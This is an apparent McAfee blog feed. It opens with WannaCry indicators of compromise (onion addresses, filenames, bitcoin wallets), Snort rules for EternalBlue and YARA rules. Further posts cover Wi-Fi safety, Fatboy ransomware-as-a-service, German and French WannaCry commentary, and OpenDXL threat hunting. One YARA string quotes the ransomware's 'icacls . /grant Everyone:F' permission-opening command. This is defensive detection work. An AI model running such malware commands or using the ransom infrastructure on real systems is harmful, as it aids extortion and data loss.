  • 57g7spgrzlojinas[dot]onion
  • xxlvbrloxvriy2c5[dot]onion
  • 76jdd2ir2embyv47[dot]onion
  • cwwnhwhlz52maqm7[dot]onion

Filenames

  • @Please_Read_Me@.txt
  • @WanaDecryptor@.exe
  • @WanaDecryptor@.exe.lnk
  • Please Read Me!.txt (Older variant)
  • C:\WINDOWS\tasksche.exe
  • C:\WINDOWS\qeriuwjhrf
  • 131181494299235.bat
  • 176641494574290.bat
  • 217201494590800.bat
  • [0-9]{15}.bat #regex
  • !WannaDecryptor!.exe.lnk
  • 00000000.pky
  • 00000000.eky
  • 00000000.res
  • C:\WINDOWS\system32\taskdl.exe

 

Bitcoin Wallets

  • 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
  • 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
  • 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
Here is a snort rule submitted to Sans from Marco Novak:

alert tcp $HOME_NET 445 -> any any (msg:”ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response”; flow:from_server,established; content:”|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|”; depth:16; fast_pattern; content:”|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|”; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:2;)

And other SNORT rules from Emerging Threats:

(http://docs.emergingthreats.net/bin/view/Main/2024218)

alert smb any any -> $HOME_NET any (msg:”ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Request (set)”; flow:to_server,established; content:”|00 00 00 31 ff|SMB|2b 00 00 00 00 18 07 c0|”; depth:16; fast_pattern; content:”|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|”; distance:0; flowbits:set,ETPRO.ETERNALBLUE; flowbits:noalert; classtype:trojan-activity; sid:2024220; rev:1;)

alert smb $HOME_NET any -> any any (msg:”ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response”; flow:from_server,established; content:”|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|”; depth:16; fast_pattern; content:”|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|”; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:1;)

 

Yara:

rule wannacry_1 : ransom

{

meta:

author = “Joshua Cannell”

description = “WannaCry Ransomware strings”

weight = 100

date = “2017-05-12”

 

Strings:

$s1 = “Ooops, your files have been encrypted!” wide ascii nocase

$s2 = “Wanna Decryptor” wide ascii nocase

$s3 = “.wcry” wide ascii nocase

$s4 = “WANNACRY” wide ascii nocase

$s5 = “WANACRY!” wide ascii nocase

$s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase

 

Condition:

any of them

}

rule wannacry_2{

meta:

author = “Harold Ogden”

description = “WannaCry Ransomware Strings”

date = “2017-05-12”

weight = 100

strings:

$string1 = “msg/m_bulgarian.wnry”

$string2 = “msg/m_chinese (simplified).wnry”

$string3 = “msg/m_chinese (traditional).wnry”

$string4 = “msg/m_croatian.wnry”

$string5 = “msg/m_czech.wnry”

$string6 = “msg/m_danish.wnry”

$string7 = “msg/m_dutch.wnry”

$string8 = “msg/m_english.wnry”

$string9 = “msg/m_filipino.wnry”

$string10 = “msg/m_finnish.wnry”

$string11 = “msg/m_french.wnry”

$string12 = “msg/m_german.wnry”

$string13 = “msg/m_greek.wnry”

$string14 = “msg/m_indonesian.wnry”

$string15 = “msg/m_italian.wnry”

$string16 = “msg/m_japanese.wnry”

$string17 = “msg/m_korean.wnry”

$string18 = “msg/m_latvian.wnry”

$string19 = “msg/m_norwegian.wnry”

$string20 = “msg/m_polish.wnry”

$string21 = “msg/m_portuguese.wnry”

$string22 = “msg/m_romanian.wnry”

$string23 = “msg/m_russian.wnry”

$string24 = “msg/m_slovak.wnry”

$string25 = “msg/m_spanish.wnry”

$string26 = “msg/m_swedish.wnry”

$string27 = “msg/m_turkish.wnry”

$string28 = “msg/m_vietnamese.wnry”

condition:

any of ($string*)

}

 

McAfee urges all its customers to ensure McAfee’s DAT updates have been applied to ensure the latest protection. We furthermore advise customers to be diligent in applying security updates for all the software solutions they use.

For more information on McAfee’s response to WannaCry, please read this Knowledge Center article.

The post An Analysis of the WannaCry Ransomware Outbreak appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/feed/ 5
Why You Need to Watch Out When Using Public Wi-Fi https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/need-watch-using-public-wi-fi/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/need-watch-using-public-wi-fi/#respond Fri, 12 May 2017 20:43:49 +0000 https://securingtomorrow.mcafee.com/?p=73927 If you’re like most people, you like to stay connected whether you are traveling or just on the go. That’s why it can be tempting to connect to free, public Wi-Fi networks, but you should know that these networks could open you up to some serious risks. Public Wi-Fi networks often lack a security measure …

The post Why You Need to Watch Out When Using Public Wi-Fi appeared first on McAfee Blogs.

]]>
If you’re like most people, you like to stay connected whether you are traveling or just on the go. That’s why it can be tempting to connect to free, public Wi-Fi networks, but you should know that these networks could open you up to some serious risks.

Public Wi-Fi networks often lack a security measure called encryption, which scrambles the information sent from your computer or device to the router so strangers cannot read it. Without this security measure in place, the information you send over these networks can potentially be intercepted by cybercrooks.

This information could include your banking and social media passwords, as well as your identity information. A nosy cybercriminal could also potentially snoop on you by watching which websites you visit, and what you type into web forms.

In fact, it is so easy to steal your information over unsecured networks cybercrooks sometimes setup malicious Wi-Fi hotspots in high-traffic areas, like airports, with the intention of grabbing users’ information.

That’s why if you have to connect when you’re away, you should only use secure and well-advertised Wi-Fi networks. You can usually tell if they use encryption because they require a password to join.

If you have to do something sensitive online, like check your bank account balance or make a purchase, try to stick to webpages that start with “HTTPS” rather than just “HTTP”. The “S” stands for secure, and indicates that the site uses encryption to protect your data. You can also look for a green lock icon at the beginning of the browser address, which indicates that the website connection is secure.

If you are on your mobile phone, you can skip the Wi-Fi network altogether and connect using the cellular network. It is somewhat more secure, since it’s harder for cybercrooks to sniff out your individual data from others on the network.

If you travel a lot, consider investing in a Virtual Private Network (VPN), which is a piece of software that allows you to create a secure connection to another network over the Internet. Anyone potentially trying to snoop on you will only see that you are connected to the VPN, and not what you are doing.

Of course, the most important thing is to remember that using public Wi-Fi is always risky, and requires some extra steps to protect your data.

Here are some more tips to help keep you safe:

  • Think twice before connecting to any public Wi-Fi network, especially if it does not require a password to join.
  • Avoid using free, public computers. Cybercriminals sometimes place compromised computers in legitimate Wi-Fi hotspots with the intention of spreading malware or stealing your data.
  • Try to save sensitive transactions, like banking and online shopping, for your secure home or work networks.
  • If you do use a public network, stick to sites that begin with “HTTPS” so you know they are secure. The HTTPS Everywhere browser extension can direct you to encrypted pages when available. Also, look for the green lock icon in the browser’s address bar.
  • When using your laptop, make sure to turn off “sharing” of your folders and devices so no one else on the network can access them. A quick web search can tell you how to do this on your operating system.
  • Use comprehensive security software and keep it up-to-date. If your software includes a firewall, make sure to enable it.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post Why You Need to Watch Out When Using Public Wi-Fi appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/need-watch-using-public-wi-fi/feed/ 0
New Ransomware Adjusts Its Price Based Off Where You Live https://securingtomorrow.mcafee.com/business/new-ransomware-adjusts-price-based-off-live/ https://securingtomorrow.mcafee.com/business/new-ransomware-adjusts-price-based-off-live/#respond Fri, 12 May 2017 20:21:22 +0000 https://securingtomorrow.mcafee.com/?p=73935 Discovered on Exploit, a Russian hacking forum, a new kind of RaaS (ransomware-as-a-service) portal named Fatboy Ransomware has emerged. The service, which is currently available for cybercriminals on the forum to leverage for their own benefit, is unique because it’s programmed to change its ransom amount based on the victim’s location, raising the amount in countries with …

The post New Ransomware Adjusts Its Price Based Off Where You Live appeared first on McAfee Blogs.

]]>
Discovered on Exploit, a Russian hacking forum, a new kind of RaaS (ransomware-as-a-service) portal named Fatboy Ransomware has emerged. The service, which is currently available for cybercriminals on the forum to leverage for their own benefit, is unique because it’s programmed to change its ransom amount based on the victim’s location, raising the amount in countries with a higher cost of living, based on the Big Mac Index.

The Big Mac Index, first introduced by The Economist in the 1980s, was meant to innocently gauge currency misalignment, but has grown to become a global standard for measuring international purchasing power parity. And now, is being used by a threat actor using the handle “polnowz,” who has apparently already made $5,321 in ransomware payments off the tool. The cybercriminal also seems to be all about transparency, as anyone that signs up for Fatboy will work directly via Jabber with the author of the product instead of a third-party distributor.

And though it is the first known online extortion product that is designed to automatically change ransom amounts based on the victim’s location, this threat comes as no surprise. Cybercriminals are mostly financially motivated, so it is expected that we see business models that facilitate increased profit. This specific financially-motivated model, ransomware-as-a-service, has been around since at least mid-2015, and was popularized by Tox, a short-lived ransomware service.

So, how does this particular case of RaaS work? The encryption algorithms used are standard, leveraging AES-256 and RSA-2048 and an offsite private key storage until the ransom is paid. And when it comes to RaaS, the buyer is generally responsible for delivering the payload while the developer hosts other services. As such, the method of delivery can be numerous. If the buyer of the portal wants to check in on the results of such delivery, they can log into an online panel for infection statistics. Other malware services have seen success by adding user friendly features such as these panels.

Fatboy is not particularly sophisticated as a malware sample, but it is a good indicator that the ransomware business model for cybercriminals is still working. As long as there are sufficient profits, we will see more offerings, tools, and support for cybercriminals without the skills or time to develop their own ransomware.

Now, the next step is to think about protection. Users should keep their security products up-to-date and engage in good security behaviors. As for IT professionals, they should be watching for artifacts of this ransomware. While the infection is generally an executable, Python is used during encryption, so be on the lookout for suspicious activity with .pyc and .pyd files.

And if you do become infected by Fatboy ransomware, No More Ransom has come together to pull together a plethora of decryption tools victims can leverage, which you can find here. Also, learn more about preventing ransomware, here.

If you’re looking to stay up-to-date on Fatboy ransomware and attacks like it, follow @McAfee and @McAfee_Business.

The post New Ransomware Adjusts Its Price Based Off Where You Live appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/new-ransomware-adjusts-price-based-off-live/feed/ 0
WannaCry – über alte und neue Würmer https://securingtomorrow.mcafee.com/languages/german/wannacry-uber-alte-und-neue-wurmer/ https://securingtomorrow.mcafee.com/languages/german/wannacry-uber-alte-und-neue-wurmer/#respond Fri, 12 May 2017 16:05:19 +0000 https://securingtomorrow.mcafee.com/?p=74403 Am Morgen des 12. Mai, einem Freitag, meldeten mehrere Quellen in Spanien den Ausbruch einer Ransomware-Variante, die inzwischen als „WannaCry“ identifiziert wurde. Sofort nach dem Eingang dieser Informationen begann McAfee, die Ransomware-Exemplare zu analysieren, Hinweise zur Beseitigung auszuarbeiten und Erkennungs-Updates für unsere Kunden zu entwickeln. Am Freitagnachmittag war das McAfee Global Threat Intelligence-System bereits aktualisiert und …

The post WannaCry – über alte und neue Würmer appeared first on McAfee Blogs.

]]>
Am Morgen des 12. Mai, einem Freitag, meldeten mehrere Quellen in Spanien den Ausbruch einer Ransomware-Variante, die inzwischen als „WannaCry“ identifiziert wurde.

Sofort nach dem Eingang dieser Informationen begann McAfee, die Ransomware-Exemplare zu analysieren, Hinweise zur Beseitigung auszuarbeiten und Erkennungs-Updates für unsere Kunden zu entwickeln.

Am Freitagnachmittag war das McAfee Global Threat Intelligence-System bereits aktualisiert und in der Lage, alle bekannten WannaCry-Varianten zu erkennen. Zudem hatten alle Kunden entsprechende DAT-Signaturaktualisierungen erhalten.

McAfee bittet dringend alle seine Kunden, diese DAT-Updates durchzuführen und zusätzlich sicherzustellen, dass auch für alle anderen Software-Lösungen alle verfügbaren Sicherheits-Updates installiert sind. Weitere Informationen finden Sie in diesem Artikel der Wissensdatenbank.

Bei den in dieser Woche beobachteten Angriffen mit der WannaCry-Ransomware wurden erstmals Wurm- und Ransomware-Taktiken kombiniert. Der mögliche Missbrauch des Eternal Blue-Exploits war seit einigen Wochen bekannt. Da der Patch für die Schwachstelle MS-17-010 des Windows-Betriebssystems auf Tausenden Systemen nicht implementiert war, konnte WannaCry innerhalb eines Tages Hunderttausende Computer in allen Branchen auf der ganzen Welt infizieren. Ebenso wie bei vielen anderen Ransomware-Kampagnen waren diese Angriffe auch dadurch so erfolgreich, weil keine oder nur eine geringe Benutzerbeteiligung erforderlich war.

Eine Mischung aus Bewährtem – und der Mensch bleibt außen vor

Der Erfolg von WannaCry lässt sich darauf zurückführen, dass ein Angriff durch die Schwachstellen, die auf vielen Systemen im Netzwerk bestehen, verstärkt werden konnte. Die Folgen des Angriffs waren daher erheblich größer als bei herkömmlichen Ransomware-Angriffen.

Fast alle Ransomware-Varianten, die derzeit im Umlauf sind, greifen einzelne Benutzer an, häufig per Spearphishing: Die Opfer erhalten eine E-Mail, die von einem scheinbar legitimen Absender kommt und den Empfänger dazu verleitet, auf einen Link zu klicken oder einen Anhang zu öffnen, der Schadcode herunterlädt bzw. auf dem System des Opfers ausführt. Dabei ist aber stets nur ein Computer des Opfers betroffen.

Erinnern Sie sich an die späten 1990er und frühen 2000er? Damals verbreiteten sich Würmer wie Code Red, NIMDA und SQL Slammer, die die Malware ohne Benutzerbeteiligung auf dem System aktivieren konnten, rasend schnell. Die WannaCry-Angriffe gingen sehr ähnlich vor.

Wir versuchen immer noch zu ermitteln, wie das „Patient Null“-System infiziert werden konnte. In jedem Fall konnte sich diese Erstinfektion auf alle Systeme im Netzwerk ausbreiten, auf denen der Patch für die Schwachstelle MS-17-010 nicht installiert war.

Die Malware hatte dabei gar nicht das Ziel, Daten zu stehlen oder andere Systeme zu beschädigen, sondern führte einen klassischen Ransomware-Angriff durch – mit verschlüsselten Dateien und einer Lösegeldforderung. Bei diesem Angriff wurden im Grunde zwei Techniken kombiniert, um eine besonders große Wirkung zu erzielen.

Das WannaCry-Problem: Wenn auf Unternehmenssystemen die Microsoft-Schwachstelle bestand, konnte sich die Ransomware nach der Infektion eines Systems sehr schnell ausbreiten und viele weitere Systeme, die ebenfalls noch nicht durch den von Microsoft im März bereitgestellten Patch geschützt waren, befallen.

Typischerweise beobachten wir, dass Cyber-Kriminelle gern Techniken kopieren, die sich bereits als effektiv erwiesen haben. Da der WannaCry-Angriff offensichtlich äußerst effektiv war, müssen wir damit rechnen, dass weitere Angreifer nach anderen Gelegenheiten suchen. Dies wird dadurch erschwert, dass dazu eine Software-Schwachstelle nötig ist, die Wurmverhalten ermöglicht.

Das Besondere an diesem Angriff ist die Tatsache, dass Microsoft bereits einen Patch für diese kritische Schwachstelle veröffentlicht hatte und ein aktives Exploit in den Umlauf gelangte. Beide Faktoren boten den Angreifern Gelegenheit und Vorlage, mit der sie eine Ransomware mit Wurmfunktionen erstellen konnten.

Offen für die Ausnutzung

In den späten 1990er Jahren wurde typischerweise verschiedenste Software auf Systemen ausgeführt, die teilweise nicht genutzt wurde. So nutzte zum Beispiel ein Wurm in den 1990er Jahren eine Schwachstelle in einem Druck-Server aus, der standardmäßig in allen Servern enthalten war – auch in Systemen ohne angeschlossenen Drucker. Auf diese Weise konnte sich der Wurm auf allen Servern im Netzwerk über diesen Drucker-Port verbinden und ein System nach dem anderen infizieren.

Diese Taktik wird seither typischerweise durch das Prinzip der minimalen Gewährung von Berechtigungen ausgehebelt. Dabei wird sichergestellt, dass eine Anwendung bzw. ein Dienst nur die Aktionen auf dem System oder im Netzwerk ausführen darf, die für die jeweiligen Aufgaben oder Funktionen erforderlich sind. Durch dieses Prinzip konnten die Erfolgschancen herkömmlicher Würmer reduziert werden, doch ungepatchte Schwachstellen imitieren dieses „offene“ Element, sodass es ausgenutzt werden kann. Das gilt ganz besonders für Schwachstellen, die Dateiübertragungen oder -freigaben für andere Systeme ermöglichen.

Die Koordination von Kampagnen wie WannaCry wird durch all die ungepatchten Schwachstellen, das veröffentlichte Exploit sowie die zahlreichen bewährten Ransomware-Technologien und -Taktiken, die Angreifern zur Verfügung stehen, deutlich vereinfacht.

Patchen oder nicht Patchen?

WannaCry sollte IT-Verantwortliche an die Dringlichkeit schneller Patch-Bereitstellungen erinnern. Einer der Gründe für das Zögern von IT-Verantwortlichen beim Patchen oder Durchführen interner Qualitätsprüfungen ist die Frage, ob Probleme durch Software-Inkompatibilitäten auftreten. Meiner Meinung nach sollte die Frage anders formuliert werden: Wenn ein Patch veröffentlicht wird, besteht immer ein Risiko durch das Anwenden des Patches und eines durch das Nichtanwenden. IT-Verantwortliche müssen die jeweiligen Folgen für ihr Unternehmen verstehen und einschätzen können.

Durch die Verzögerung einer Patch-Bereitstellung können sie das Risiko einer Anwendungsinkompatibilität minimieren. Gleichzeitig erhöhen sie jedoch das Risiko einer Kompromittierung durch eine Bedrohung, die genau diese Schwachstelle ausnutzt. IT-Verantwortliche müssen für jeden Patch verstehen, wie hoch und schwerwiegend diese Risiken sind und dann entscheiden, wie sie das Risiko für das Unternehmen minimieren können.

Ereignisse wie WannaCry haben das Potenzial, diese Denkweise zu ändern. Eines der Probleme, die wir in Bezug auf die Sicherheit häufig beobachten, ist der Glaube, dass nicht erfolgte Angriffe mit einer funktionierenden Abwehr gleichzusetzen sind. Unternehmen, die heute eher entspannt an die Anwendung von Patches herangehen, haben vielleicht einfach noch keine Angriffe erlebt, die genau diese Schwachstellen ausnutzen. Das könnte die Einstellung verstärken, dass das Aufschieben von Patch-Bereitstellungen in Ordnung ist.

Dieser Vorfall sollte jedoch Unternehmen daran erinnern, dass sie einen strikten Patch-Bereitstellungsplan benötigen, um die Schwachstellen in ihrer Umgebung zu reduzieren.

Warum wurden Krankenhäuser angegriffen?

Krankenhäuser fallen in eine Kategorie, die ich als „weiche Ziele“ bezeichne, d. h. sie konzentrieren sich meist in erster Linie auf die Patientenfürsorge und weniger auf bestmögliche Mitarbeiter für Cyber-Abwehr sowie bestmögliche Technologien zum Schutz vor Cyber-Angriffen.

Das liegt daran, dass Angriffe auf Krankenhäuser für Cyber-Kriminelle in der Vergangenheit als wenig reizvoll galten. Sie konnten vielleicht Patientenakten oder andere Daten stehlen, doch der Gesamtwert der Daten in einem Krankenhaus liegt normalerweise unter dem Wert der massenhaft bei anderen Branchen (z. B. Finanzdienstleistern) gestohlenen Daten.

Ransomware hat dafür gesorgt, dass es sich für Kriminelle lohnt, beliebige Unternehmen anzugreifen. Da es den Kriminellen ausschließlich um die Lösegeldforderung geht, ist es erheblich einfacher, ein Unternehmen mit schwacher Cyber-Abwehr als eines mit starken Schutzmaßnahmen anzugreifen. Deshalb wurden im vergangenen Jahr Krankenhäuser, Schulen, städtische Polizeibehörden und Universitäten Opfer von Ransomware-Angriffen. Während wir derzeit auch einige Angriffe auf „härtere Ziele“ beobachten, bieten sich Kriminellen zahlreiche Gelegenheiten, ihre Attacken auf diese weichen Ziele fortzusetzen.

Wie geht es weiter?

Obwohl dieser Angriff neu ist und einige Überlegungen auslösen sollte, dürfen wir Folgendes nicht vergessen: Wenn bekanntermaßen eine Schwachstelle im Umlauf ist und ein Exploit veröffentlicht wurde, das von Cyber-Kriminellen ausgenutzt werden könnte, müssen wir immer mit derartigen Angriffen rechnen und darauf vorbereitet sein, dass schon bald zahlreiche Nachahmerangriffe folgen werden.

The post WannaCry – über alte und neue Würmer appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/languages/german/wannacry-uber-alte-und-neue-wurmer/feed/ 0
Expanding Automated Threat Hunting and Response with Open DXL https://securingtomorrow.mcafee.com/business/optimize-operations/expanding-automated-threat-hunting-response-open-dxl/ https://securingtomorrow.mcafee.com/business/optimize-operations/expanding-automated-threat-hunting-response-open-dxl/#respond Fri, 12 May 2017 16:00:09 +0000 https://securingtomorrow.mcafee.com/?p=73896 Today everyone is talking about security automation. However, what are the right processes and actions to automate safely? What are the right processes and actions to automate that will actually achieve some security outcome, such as improving sec ops efficiency or reducing attacker dwell time? Just look in the latest industry report and you will …

The post Expanding Automated Threat Hunting and Response with Open DXL appeared first on McAfee Blogs.

]]>
Today everyone is talking about security automation. However, what are the right processes and actions to automate safely? What are the right processes and actions to automate that will actually achieve some security outcome, such as improving sec ops efficiency or reducing attacker dwell time? Just look in the latest industry report and you will find a statistic about how long attackers linger in a network without detection. It’s getting better, but the average is still heavily in favor of the attacker.

One of the reasons why attackers are so successful at maintaining persistence is that most organizations struggle to make effective use of threat intelligence. Making effective use means taking the volumes of threat intelligence data, primarily technical Indicators of Compromise (IOCs), hunting for affected systems with those IOCs, and then adapting countermeasures to contain the incident or just update protection. These critical tasks, collecting and validating intelligence, performing triage, and adapting cyber defenses to contain incident must be automated if we ever want to get ahead of the attackers.

McAfee’s Intelligent Security Operations solution automates many key threat hunting tasks. In this solution, McAfee Advanced Threat Defense (ATD), a malware analytic system, produces the local IOCs based on malware submissions from the endpoint and network sensors. It automatically shares the new intelligence with McAfee Enterprise Security Manager (ESM) for automated historical analysis, with the McAfee Active Response component of McAfee Endpoint Threat Defense and Response (ETDR) for real time endpoint analysis, and with McAfee Threat Intelligence Exchange (TIE) for automated containment at the endpoint or network.

However, wouldn’t it be great if we could automate hunting and incident containment for all threat intelligence, not just file hashes? We can expand the capability of the Intelligent Security Operations solution to handle more intelligence and automate more incident response tasks using the power of OpenDXL.

Consolidate Threat Intelligence Collection with OpenDXL and MISP

Organizations need threat intelligence from three different sources:

  • Global intelligence from vendors or large providers
  • Community Intelligence from closed sources, and
  • Enterprise, or Local-Produced

Local threat intelligence, typically produced by malware sandboxes, such as McAfee Advanced Threat Defense (ATD), or learned from previous incident investigations, usually relates to attacks targeted at the enterprise and would not be visible through other external intelligence feeds. Large organizations typically consolidate these feeds inside a threat intelligence platform to simplify the management, sharing and processing of the data.

Using OpenDXL, we can more simply push locally-produced intelligence from ATD into threat intelligence platforms, such as Malware Information Sharing Platform (MISP), an open source intelligence sharing platform. Inside MISP, ATD data can be labeled and combined with other sources providing a central repository to operationalize threat intelligence. Using OpenDXL, MISP can then push all threat intelligence-based IOCs to ESM and Active Response for further triage and out to firewalls, proxies, endpoints and other cyber defense tools for automated containment.

Full IOC Hunting with ESM, Active Response and OpenDXL

One of the best ways to reduce attacker dwell time is to use threat intelligence to hunt for compromised systems in the enterprise with ESM and Active Response. With threat intelligence centrally collected in MISP, we can automate historical analysis using the existing back trace feature in ESM. Using OpenDXL integration with MISP, we can also hunt on all the IOCs and send the results back to ESM or Kibana. This expands the capability of the original solution fully automating the hunting process with both historical and real time searches for all IOCs, not just local intelligence.

Automated Incident Containment with OpenDXL

If a system is found to be comprised, the next task is to contain and update defenses as fast as possible. When it comes to updating cyber defense countermeasures, such as firewalls or web proxy, internal procedures or business silos can slow response. For example, sending a ticket to the firewall team or service provider to block a command-and-control IP address or domain could take hours even in mature organizations. These silos slow down incident response and increase attackers’ dwell time.

With OpenDXL integration with MISP, we can reduce dwell time by pushing all indicators, not just file hashes, out to network and endpoint countermeasures. With OpenDXL integration with MISP, indicators such as command-and-control IP addresses, malicious URLs or domains, and file hashes can be automatically shared with the McAfee Dynamic Endpoint, Network Firewalls such as Force Point or Checkpoint, or Web Proxies such as McAfee Web Gateway. With OpenDXL integration with MISP, we can automate indicator-sharing with any countermeasures on the network or endpoint, to reduce dwell time and better protect your business.

For more information on automated threat hunting with OpenDXL and to get connected with the community of OpenDXL users, I’d encourage you to check out the McAfee DXL architecture guide and the data sheet.

The post Expanding Automated Threat Hunting and Response with Open DXL appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/optimize-operations/expanding-automated-threat-hunting-response-open-dxl/feed/ 0
WannaCry : les vers d’hier font peau neuve https://securingtomorrow.mcafee.com/languages/francais/wannacry-les-vers-dhier-font-peau-neuve/ https://securingtomorrow.mcafee.com/languages/francais/wannacry-les-vers-dhier-font-peau-neuve/#respond Fri, 12 May 2017 15:44:17 +0000 https://securingtomorrow.mcafee.com/?p=74459 Le vendredi 12 mai en matinée, de nombreuses sources en Espagne ont été les premières à signaler l’apparition d’une vague d’attaques informatiques menées à l’aide du ransomware désormais identifié sous le nom de WannaCry. Dès que McAfee a été informé de ces incidents, notre équipe s’est immédiatement attelée à analyser des échantillons de ce logiciel de …

The post WannaCry : les vers d’hier font peau neuve appeared first on McAfee Blogs.

]]>
Le vendredi 12 mai en matinée, de nombreuses sources en Espagne ont été les premières à signaler l’apparition d’une vague d’attaques informatiques menées à l’aide du ransomware désormais identifié sous le nom de WannaCry.

Dès que McAfee a été informé de ces incidents, notre équipe s’est immédiatement attelée à analyser des échantillons de ce logiciel de demande de rançon. Nous avons mis au point des mises à jour pour sa détection ainsi que des conseils de prévention à l’intention de nos clients.

Le vendredi après-midi, le système de cyberveille McAfee Global Threat Intelligence a été actualisé pour permettre l’identification de tous les échantillons connus de WannaCry. En outre, nous avons fourni à tous nos clients des mises à jour de signatures (fichiers DAT).

Nous leur conseillons vivement non seulement de s’assurer que ces mises à jour DAT ont été appliquées, mais aussi de veiller au déploiement des mises à jour de sécurité requises pour toutes les solutions logicielles qu’ils utilisent. Pour plus d’informations, veuillez consulter cet article du Knowledge Center.

L’offensive menée à l’aide de WannaCry est inédite : c’était la première fois que l’on observait un mode opératoire combinant des tactiques typiques des vers avec le modèle économique des ransomwares. La conversion en outil d’attaque de l’exploit Eternal Blue, rendu public il y a plusieurs semaines, et la mise à profit de milliers de failles de systèmes d’exploitation Windows encore présentes malgré la publication du correctif MS-17-010 ont permis à WannaCry d’infecter des centaines de milliers d’ordinateurs. Tous les secteurs d’activité et la planète entière ont été frappés, en un jour à peine. De plus, ces attaques n’ont pas nécessité d’intervention humaine, ou très peu, comme c’est généralement le cas dans les campagnes de propagation de ransomware.

Un croisement entre méthodes éprouvées, sans le facteur humain

La réussite de WannaCry est due à sa capacité à amplifier chaque attaque grâce à l’exploitation des vulnérabilités de nombreuses machines connectées au réseau. L’impact est donc nettement plus important que celui des campagnes de diffusion de ransomware classiques observées jusqu’ici.

Pratiquement tous les logiciels de demande de rançon qui sévissent à l’heure actuelle visent des utilisateurs particuliers, souvent par des techniques de harponnage (spear phishing). Ainsi, les cibles reçoivent généralement un e-mail qui semble émaner d’un expéditeur légitime et les incite à cliquer sur un lien ou à ouvrir une pièce jointe entraînant le téléchargement ou l’exécution de code malveillant sur le système du destinataire. Ce type d’attaque n’affecte cependant que l’ordinateur de la victime.

Dans les années 1990 et au début des années 2000, à l’époque de Code Red, NIMDA et SQL Slammer, ces vers se propageaient rapidement parce qu’ils n’avaient pas besoin du concours de l’être humain pour activer le logiciel malveillant sur les ordinateurs. Les attaques qui ont fait rage à la mi-mai ont eu un comportement similaire.

Nous essayons toujours de déterminer comment une machine « patient zéro » a pu être infectée, mais nous savons qu’à partir de cette première infection, d’autres systèmes dépourvus du correctif MS-17-010 étaient contaminés via leur réseau.

Plutôt que de voler des données ou d’endommager d’autres machines, le logiciel malveillant a exécuté une attaque par ransomware classique, en chiffrant des fichiers et en exigeant une rançon. Deux techniques ont été associées pour produire un impact maximal.

Dans le cas où les systèmes de l’entreprise présentaient la vulnérabilité en question (pour laquelle Microsoft avait publié une mise à jour de sécurité en mars), le ransomware WannaCry pouvait infecter un premier ordinateur, puis se propager très rapidement et toucher de nombreuses autres machines dépourvues du correctif ad hoc.

En matière de cybercrime, nous savons que lorsqu’une technique se révèle efficace, elle est presque systématiquement copiée. Vu la réussite impressionnante de cette cyberattaque, on peut raisonnablement penser qu’elle inspirera d’autres pirates. Elle sera cependant difficile à reproduire car ce type d’approche nécessite la présence d’une vulnérabilité logicielle dont les caractéristiques permettent l’expression d’un comportement similaire à celui d’un ver informatique.

L’attaque WannaCry est unique en cela qu’elle a tiré parti à la fois d’une vulnérabilité critique pour laquelle Microsoft avait déjà publié un correctif et d’un exploit actif qui s’est retrouvé sur Internet, accessible à quiconque : ces deux facteurs ont offert à son auteur l’opportunité et le modèle de fonctionnement lui permettant de créer ce ver de demande de rançon très particulier.

Une brèche ouverte aux exploits

À la fin des années 1990, il était courant de laisser s’exécuter toutes sortes de logiciels sur des ordinateurs qui pourtant n’étaient pas en cours d’utilisation. Ainsi, un des vers actifs à cette époque tirait parti d’une vulnérabilité d’un logiciel de serveur d’impression qui était inclus par défaut sur tous les serveurs, même si la configuration ne comptait en réalité aucune imprimante. Tous les serveurs du réseau étaient donc exposés au risque qu’un ver se connecte à leur port d’imprimante, créant ainsi un scénario de propagation où le ver pouvait infecter un système après l’autre.

Pour contrer ce type d’attaque, une bonne pratique appelée « principe du moindre privilège » a été adoptée. Selon celle-ci, une application ou un service exécute sur une machine ou un réseau uniquement les éléments strictement nécessaires à l’accomplissement des tâches ou fonctions propres à son rôle particulier. L’application de ce principe a limité les risques d’attaques par des vers traditionnels, mais les vulnérabilités non corrigées laissent elles aussi une porte ouverte par laquelle les exploits peuvent s’engouffrer — particulièrement lorsqu’elles permettent des transferts de fichiers, des partages entre systèmes, etc.

Il serait très compliqué d’orchestrer des attaques telles que la campagne WannaCry sans la présence de vulnérabilités non corrigées, sans un exploit rendu public et sans disposer d’une série de technologies et tactiques de ransomware à l’efficacité éprouvée.

Corriger ou ne pas corriger, telle est la question

WannaCry doit rappeler aux équipes informatiques combien il est essentiel d’appliquer rapidement les patchs requis. L’une des raisons pour lesquelles elles hésitent à corriger leurs systèmes ou à exécuter un contrôle qualité interne est qu’elles veulent s’assurer de l’absence de problèmes de compatibilité logicielle. J’envisage la question sous un angle différent : lorsqu’un correctif est disponible, tant son application que sa non-application comportent un certain risque. L’un des rôles du responsable informatique consiste à peser ces risques respectifs et à évaluer ce qu’ils représentent pour leur entreprise.

Dans certains cas, retarder le déploiement d’un patch limite les risques d’incompatibilité. Dans d’autres, cela augmente le risque de compromission par une menace qui exploiterait une vulnérabilité existante. Pour chaque patch, l’équipe informatique doit déterminer le niveau de risque associé à chaque cas de figure et ensuite prendre la bonne décision, celle qui mettra le moins possible l’entreprise en péril.

